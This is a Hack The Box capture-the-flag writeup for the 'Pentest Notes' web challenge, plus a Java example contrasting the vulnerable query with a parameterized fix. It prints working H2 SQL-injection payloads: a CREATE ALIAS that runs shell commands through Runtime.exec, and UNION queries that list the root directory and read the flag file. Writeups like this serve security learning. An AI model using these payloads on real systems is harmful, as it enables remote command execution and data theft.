Pentest Notes

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of Pentest Notes, a web challenge from Hack The Box.

The SQL query in NotesController.java is vulnerable to SQL injection: the note name is formatted straight into the query string, so a single quote in the input closes the literal and the rest is parsed as SQL.

Select * from notes where name ='%s'

Read the flag with H2 SQL injection. H2 lets you define a Java function with CREATE ALIAS and call it from a query, which turns the injection into command execution (payload adapted from this gist):

https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

$$ is not allowed by the challenge, so the $$ ... $$ dollar quoting of the Java source in the gist is replaced with single quotes. This works because the Java body contains no single quotes of its own.

Create the alias (the first statement is the application's SELECT, the injected CREATE ALIAS follows after the semicolon, and -- comments out the trailing quote):

SQL Injection'; CREATE ALIAS RUN as 'String e(String cmd) throws java.io.IOException{java.lang.Runtime rt= java.lang.Runtime.getRuntime();java.util.Scanner s = new java.util.Scanner(rt.exec(cmd).getInputStream());return s.nextLine();}'--

Get the file name

From the Dockerfile we know that the flag file has a random prefix, so list / first. The notes table has three columns, so the UNION needs three values, with the RUN() call in the last one. Note that the alias returns only the first line of the command output (Scanner.nextLine()), so ls / shows a single entry; here that entry is the flag file.

SQL Injection' union select null, null, RUN('ls /'); --

Read the flag with the same UNION, this time running cat on the file found above:

SQL Injection' union select null, null, RUN('cat /JN8fe3XRqTYK_flag.txt'); --
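As an added example, not code from the challenge (the real NotesController.java is not reproduced here), the vulnerable pattern the notes above describe next to a parameterized fix. Assumptions for the demo: an in-memory H2 database, a notes table with three columns (id, name, content) to match the three-column UNION above, and the query text quoted earlier. The payload uses a harmless string literal where the writeup uses RUN('ls /'); the shape of the injection is the same.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

// Added demo, not the challenge's source. Table layout and the H2 URL are assumptions.
public class NotesLookupDemo {
    private static final String URL = "jdbc:h2:mem:notes;DB_CLOSE_DELAY=-1";

    static void setup(Connection c) throws SQLException {
        try (Statement st = c.createStatement()) {
            st.execute("CREATE TABLE notes(id INT, name VARCHAR(64), content VARCHAR(1024))");
            st.execute("INSERT INTO notes VALUES (1, 'SQL Injection', 'notes about sqli')");
        }
    }

    // Vulnerable: the name is formatted into the SQL text, exactly as on the page.
    // A ' in the input closes the literal; H2 also runs several ';'-separated
    // statements passed in one call, which is what lets CREATE ALIAS through.
    static List<String> findVulnerable(Connection c, String name) throws SQLException {
        String sql = String.format("Select * from notes where name ='%s'", name);
        List<String> out = new ArrayList<>();
        try (Statement st = c.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            while (rs.next()) {
                out.add(rs.getString(3)); // third column: content (assumed layout)
            }
        }
        return out;
    }

    // Fixed: the value is bound as a parameter and is never parsed as SQL,
    // so the quote, the UNION and the CREATE ALIAS are just characters in a name.
    static List<String> findSafe(Connection c, String name) throws SQLException {
        List<String> out = new ArrayList<>();
        try (PreparedStatement ps = c.prepareStatement("SELECT * FROM notes WHERE name = ?")) {
            ps.setString(1, name);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    out.add(rs.getString(3));
                }
            }
        }
        return out;
    }

    public static void main(String[] args) throws SQLException {
        try (Connection c = DriverManager.getConnection(URL)) {
            setup(c);
            // Same shape as the writeup's payload, with a literal in place of RUN('ls /').
            String payload = "SQL Injection' union select null, null, 'injected' --";
            // Vulnerable path returns the real note plus the injected row.
            System.out.println("vulnerable: " + findVulnerable(c, payload));
            // Safe path matches no note named like the payload and returns an empty list.
            System.out.println("safe:       " + findSafe(c, payload));
        }
    }
}
```

Run it with the H2 jar on the classpath. Parameterizing the query is the fix for the injection itself; as defense in depth, H2 requires admin rights for CREATE ALIAS, so the application's database user should not be an admin, which would have stopped the alias step even with the injection present.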
